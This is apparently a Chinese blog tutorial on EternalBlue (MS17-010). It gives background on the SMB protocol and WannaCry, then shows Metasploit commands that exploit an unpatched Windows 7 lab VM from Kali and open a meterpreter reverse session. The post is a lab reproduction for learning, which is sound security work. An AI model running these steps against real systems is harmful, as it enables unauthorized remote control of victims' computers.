永恒之蓝漏洞利用

简介: 永恒之蓝漏洞利用

一、什么是永恒之蓝

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

二、什么是SMB协议

SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

三、漏洞描述

永恒之蓝 主要就是通过TCP端口(445)和139 来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器里进行一系列的危险操作。如远程控制木马,获取最高权限等。

四、影响范围

windows xp 2003 2008 7 8 等受影响

五、漏洞利用

1.准备一台kali虚拟机,一台windows 7虚拟机

2.分别查看kali和windows 7的IP地址

640.png

640.png

kali ip:192.168.110.140

windows 7 ip:192.168.110.145

3.检查kali和windows 7的连通性:用kali去ping windows 7

640.png

这里是相通的

4.启动kali上msf的数据库

systemctl start postgresql

640.png

这里看看是否开启成功

640.png

已开启。

5、打开msf进行漏洞利用

640.png

用db_status查看是否连接上数据库

640.png

显示已连接

查找我们的漏洞利用模块

search ms17_010

640.png

使用漏洞利用模块

use exploit/windows/smb/ms17_010_eternalblue

640.png

使用show options查看一下要配置的命令参数

640.png

配置相应的参数

set rhost 192.168.110.145

640.png

因为默认设置的是meterpreter的反向连接并且设置好了选项,这里我们就不设置payload了,就用默认的。

640.png

这样我们所有必须要设置的参数就设置好了,我们可以run运行我们的漏洞模块

640.png

利用成功

因为利用的是meterpreter的payload所以我们还可以进行一些后渗透操作!

目录
相关文章
|
7月前
|
Shell 数据安全/隐私保护 Windows
MSF永恒之蓝使用
MSF永恒之蓝使用
80 0
|
7月前
|
SQL 安全 测试技术
渗透测试基础之永恒之蓝漏洞复现
对于当下来说我们使用的电脑大多是win11或是win10,还是有很多政府和公司,或是学校中使用的系统还停留在win7系统.今天是我进行渗透测试的第一次实战,通过永恒之蓝漏洞利用对win7系统进行渗透,当然也会对渗透测试的流程进行一个详细的介绍.,渗透测试的流程信息较为详细,内容较多,如果想看实战流程,直接通过通过这次的渗透测试,虽然不是对web间进行渗透测试,但是通过实战能够使我能够熟悉渗透测试的流程,当然在实践过程中也出现了很多问题,例如从kali上传文件到win主机路径出现问题,配置攻击模块时将ip地址设置错误,但在我不断的思考和尝试下,最终解决了问题,对于我的解决问题的能力也是一种提升.
368 3
|
7月前
|
安全 网络协议 Shell
永恒之蓝(MS17-010)漏洞利用
永恒之蓝(MS17-010)漏洞利用
442 1
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
1149 5
ms17-010(永恒之蓝)漏洞复现
|
安全 网络安全 Windows
CVE-2017-0143永恒之蓝复现
CVE-2017-0143永恒之蓝复现
144 0
|
安全 开发工具 git
win10永恒之黑漏洞复现
win10永恒之黑漏洞复现
133 0
|
安全 Shell Linux
kali (永恒之蓝MS17_010)漏洞复现
kali (永恒之蓝MS17_010)漏洞复现
227 0
|
安全 数据安全/隐私保护 Windows
“永恒之蓝”勒索病毒检测+恢复工具
预测第二波WannaCry勒索病毒攻击即将到来! NSA黑客武器库泄漏的“永恒之蓝”发起的病毒攻击事件。 解决方案:勒索蠕虫病毒文件恢复工具 检测工具下载
170 0
|
安全 网络安全 API
MS17-010永恒之蓝漏洞的浅谈与利用
MS17-010永恒之蓝漏洞的浅谈与利用
466 0
|
安全 Linux 区块链
勒索病毒WannaCry(永恒之蓝)
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://solin.blog.51cto.com/11319413/1925890 勒索病毒WannaCry(永恒之蓝)   日前,"永恒之蓝"席卷全球,已经有90个国家遭到***。
2009 0